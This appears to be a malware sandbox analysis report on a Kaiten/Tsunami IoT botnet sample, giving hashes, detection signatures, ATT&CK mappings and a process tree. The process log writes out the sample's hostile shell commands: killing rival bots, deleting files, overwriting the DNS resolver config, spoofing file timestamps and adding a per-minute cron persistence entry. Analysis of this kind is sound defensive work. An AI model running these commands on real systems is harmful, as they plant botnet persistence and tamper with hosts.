kaiten | 9789a54be7b6faea45f1ad9a2b92f32fb602390a40f4d301c786cf2ee2b39459

General

Target

620db8719f37ec3f8de6e9656655ef5b
Size

63KB
MD5

620db8719f37ec3f8de6e9656655ef5b
SHA1

659b8c8a12548c747782e96886c83941c64e6ab2
SHA256

9789a54be7b6faea45f1ad9a2b92f32fb602390a40f4d301c786cf2ee2b39459
SHA512

62a8809e42070736e8a67cba144c379f428e30fb76ee14a627ce0afe3c5353b03338710862dba77c0c0d07468e925d18df9a787b50bd99a787bda3d6a0bbe08a
SSDEEP

768:+rQMpqc88Ah5AW4Z9xHZGKs1RK0ppgJu4RDbnHhsJgGlzDpYuR1J1fUO:+rQ21jW4HhQKsK0p94vkVGuXfU

Score

10^/10

kaiten botnet persistence

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/722-1-0x00400000-0x0045fc04-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.

Dynamic Resolution
T1568

Processes:

description ioc

File opened for modification /etc/resolv.conf
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
persistence

Scheduled Task/Job
T1053

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.P3Oepd crontab
Enumerates running processes
Discovers information about currently running processes on the system

description	ioc
File opened for modification	/etc/resolv.conf

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.P3Oepd	crontab

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

killallkillallkillallkillallkillallkillallkillallkillallkillall620db8719f37ec3f8de6e9656655ef5b

description	ioc	process
File opened for reading	/proc/387/stat	killall
File opened for reading	/proc/76/stat	killall
File opened for reading	/proc/319/stat	killall
File opened for reading	/proc/711/stat	killall
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/72/stat	killall
File opened for reading	/proc/18/stat	killall
File opened for reading	/proc/387/stat	killall
File opened for reading	/proc/116/cmdline	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/783/stat	killall
File opened for reading	/proc/5/stat	killall
File opened for reading	/proc/74/stat	killall
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/474/stat	killall
File opened for reading	/proc/2/stat	killall
File opened for reading	/proc/77/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/76/stat	killall
File opened for reading	/proc/146/stat	killall
File opened for reading	/proc/715/cmdline	killall
File opened for reading	/proc/707/stat	killall
File opened for reading	/proc/79/stat	killall
File opened for reading	/proc/version	620db8719f37ec3f8de6e9656655ef5b
File opened for reading	/proc/328/stat	killall
File opened for reading	/proc/3/stat	killall
File opened for reading	/proc/36/stat	killall
File opened for reading	/proc/324/stat	killall
File opened for reading	/proc/715/cmdline	killall
File opened for reading	/proc/115/stat	killall
File opened for reading	/proc/715/stat	killall
File opened for reading	/proc/707/stat	killall
File opened for reading	/proc/146/cmdline	killall
File opened for reading	/proc/776/stat	killall
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/522/stat	killall
File opened for reading	/proc/70/stat	killall
File opened for reading	/proc/71/stat	killall
File opened for reading	/proc/372/stat	killall
File opened for reading	/proc/146/cmdline	killall
File opened for reading	/proc/6/stat	killall
File opened for reading	/proc/71/stat	killall
File opened for reading	/proc/74/stat	killall
File opened for reading	/proc/116/stat	killall
File opened for reading	/proc/37/stat	killall
File opened for reading	/proc/76/stat	killall
File opened for reading	/proc/68/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/707/stat	killall
File opened for reading	/proc/116/stat	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/116/stat	killall
File opened for reading	/proc/722/stat	killall
File opened for reading	/proc/22/stat	killall
File opened for reading	/proc/327/stat	killall
File opened for reading	/proc/522/stat	killall
File opened for reading	/proc/323/stat	killall
File opened for reading	/proc/323/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/150/stat	killall
File opened for reading	/proc/115/stat	killall
File opened for reading	/proc/14/stat	killall

/tmp/620db8719f37ec3f8de6e9656655ef5b
/tmp/620db8719f37ec3f8de6e9656655ef5b
1⤵
- Reads runtime system information
PID:722

/bin/sh
sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"
2⤵
PID:724

/bin/sh
sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"
2⤵
PID:727

/bin/sh
sh -c "rm -rf /var/run/tty0 > /dev/null 2>&1 &"
2⤵
PID:731

/bin/sh
sh -c "rm -rf /var/run/tty2 > /dev/null 2>&1 &"
2⤵
PID:736

/bin/sh
sh -c "rm -rf /var/run/tty3 > /dev/null 2>&1 &"
2⤵
PID:739

/bin/sh
sh -c "rm -rf /var/run/tty4 > /dev/null 2>&1 &"
2⤵
PID:741

/bin/sh
sh -c "rm -rf /var/run/tty5 > /dev/null 2>&1 &"
2⤵
PID:744

/bin/sh
sh -c "rm -rf /var/run/tty6 > /dev/null 2>&1 &"
2⤵
PID:747

/bin/sh
sh -c "rm -rf /tmp/tty0 > /dev/null 2>&1 &"
2⤵
PID:749

/bin/sh
sh -c "rm -rf /tmp/tty2 > /dev/null 2>&1 &"
2⤵
PID:751

/bin/sh
sh -c "rm -rf /tmp/tty3 > /dev/null 2>&1 &"
2⤵
PID:753

/bin/sh
sh -c "rm -rf /tmp/tty4 > /dev/null 2>&1 &"
2⤵
PID:755

/bin/sh
sh -c "rm -rf /tmp/tty5 > /dev/null 2>&1 &"
2⤵
PID:757

/bin/sh
sh -c "rm -rf /tmp/tty6 > /dev/null 2>&1 &"
2⤵
PID:760

/bin/sh
sh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"
2⤵
PID:762

/bin/sh
sh -c "killall -9 arm > /dev/null 2>&1 &"
2⤵
PID:765

/bin/sh
sh -c "killall -9 mips > /dev/null 2>&1 &"
2⤵
PID:767

/bin/sh
sh -c "killall -9 mipsel > /dev/null 2>&1 &"
2⤵
PID:769

/bin/sh
sh -c "killall -9 powerpc > /dev/null 2>&1 &"
2⤵
PID:771

/bin/sh
sh -c "killall -9 ppc > /dev/null 2>&1 &"
2⤵
PID:773

/bin/sh
sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"
2⤵
PID:775

/bin/sh
sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"
2⤵
PID:778

/bin/sh
sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"
2⤵
PID:780

/bin/sh
sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"
2⤵
PID:782

/bin/sh
sh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"
2⤵
PID:785

/bin/sh
sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"
2⤵
PID:788

/bin/sh
sh -c "sleep 432000 && reboot &"
2⤵
PID:791

/bin/sh
sh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"
2⤵
PID:793

/bin/sh
sh -c "chmod 700 /tmp/620db8719f37ec3f8de6e9656655ef5b > /dev/null 2>&1 &"
2⤵
PID:796

/bin/sh
sh -c "touch -acmr /bin/ls /tmp/620db8719f37ec3f8de6e9656655ef5b"
2⤵
PID:798

/usr/bin/touch
touch -acmr /bin/ls /tmp/620db8719f37ec3f8de6e9656655ef5b
3⤵
PID:799

/bin/sh
sh -c "(crontab -l | grep -v \"/tmp/620db8719f37ec3f8de6e9656655ef5b\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
2⤵
PID:800

/bin/sh
sh -c "echo \"* * * * * /tmp/620db8719f37ec3f8de6e9656655ef5b > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
2⤵
PID:807

/bin/sh
sh -c "crontab /var/run/.x001804289383"
2⤵
PID:808

/usr/bin/crontab
crontab /var/run/.x001804289383
3⤵
- Creates/modifies Cron job
PID:809

/bin/sh
sh -c "rm -rf /var/run/.x001804289383"
2⤵
PID:810

/bin/rm
rm -rf /var/run/.x001804289383
3⤵
PID:812

/bin/sh
sh -c "/bin/uname -n"
2⤵
PID:813

/bin/uname
/bin/uname -n
3⤵
PID:814

/bin/sh
sh -c "/bin/uname -n"
2⤵
PID:815

/bin/uname
/bin/uname -n
3⤵
PID:816

/bin/rm
rm -rf /var/run/wgsh
1⤵
PID:726

/bin/rm
rm -rf /var/run/bbsh
1⤵
PID:730

/bin/rm
rm -rf /var/run/tty0
1⤵
PID:735

/bin/rm
rm -rf /var/run/tty2
1⤵
PID:738

/bin/rm
rm -rf /var/run/tty3
1⤵
PID:740

/bin/rm
rm -rf /var/run/tty4
1⤵
PID:743

/bin/rm
rm -rf /var/run/tty5
1⤵
PID:746

/bin/rm
rm -rf /var/run/tty6
1⤵
PID:748

/bin/rm
rm -rf /tmp/tty0
1⤵
PID:750

/bin/rm
rm -rf /tmp/tty2
1⤵
PID:752

/bin/rm
rm -rf /tmp/tty3
1⤵
PID:754

/bin/rm
rm -rf /tmp/tty4
1⤵
PID:756

/bin/rm
rm -rf /tmp/tty5
1⤵
PID:759

/bin/rm
rm -rf /tmp/tty6
1⤵
PID:761

/bin/rm
rm -rf /var/run/pty
1⤵
PID:764

/usr/bin/killall
killall -9 arm
1⤵
- Reads runtime system information
PID:766

/usr/bin/killall
killall -9 mips
1⤵
- Reads runtime system information
PID:768

/usr/bin/killall
killall -9 mipsel
1⤵
- Reads runtime system information
PID:770

/usr/bin/killall
killall -9 powerpc
1⤵
- Reads runtime system information
PID:772

/usr/bin/killall
killall -9 ppc
1⤵
- Reads runtime system information
PID:774

/usr/bin/killall
killall -9 daemon.armv4l.mod
1⤵
- Reads runtime system information
PID:777

/usr/bin/killall
killall -9 daemon.i686.mod
1⤵
- Reads runtime system information
PID:779

/usr/bin/killall
killall -9 daemon.mips.mod
1⤵
- Reads runtime system information
PID:781

/usr/bin/killall
killall -9 daemon.mipsel.mod
1⤵
- Reads runtime system information
PID:784

/bin/cat
cat "/tmp/.xs/*.pid"
1⤵
PID:789

/bin/rm
rm -rf "/tmp/.xs/*"
1⤵
PID:790

/bin/sleep
sleep 432000
1⤵
PID:794

/bin/chmod
chmod 700 /tmp/620db8719f37ec3f8de6e9656655ef5b
1⤵
PID:797

/usr/bin/crontab
crontab -l
1⤵
PID:803

/bin/grep
grep -v /tmp/620db8719f37ec3f8de6e9656655ef5b
1⤵
PID:804

/bin/grep
grep -v "no cron"
1⤵
PID:805

/bin/grep
grep -v lesshts/run.sh
1⤵
PID:806

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Dynamic Resolution

1

T1568

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/run/.x001804289383
Filesize
67B

MD5
543008a3e418c94d47345ab679078d69

SHA1
448b0f665f83a85f7bdb338ef63f22af0e5a2705

SHA256
cbb93990f1886fad34836335a811889f4b1520372b16777e2973d42528dc3aff

SHA512
0492179696b7dc89d7ce4e1fc4f60bda77d88720f5e92e1fde59ed1ea7443eecdd3b68c601d80f30e7da1e839eb7d73108e8a75ef41bf996ada4ad3c2e64ca99

Download Submit
/var/spool/cron/crontabs/tmp.P3Oepd
Filesize
264B

MD5
7c611f2bf05cd99c1fedca9dffc147db

SHA1
f485b65c015664404319fd6e3fb62ebcd6c967af

SHA256
79548bedad53829a6467e81b16c1931de9e2c8ee6624cf908c86c459f33a01c6

SHA512
00e3f388b2e2eac2b39d190f002496582680639d57e6e6e814f5cbe483bb4fbd62d891056372fc8dba72f93aa0dc32fc62df124f2367d5ab4c884d8b1777f80a

Download Submit
memory/722-1-0x00400000-0x0045fc04-memory.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads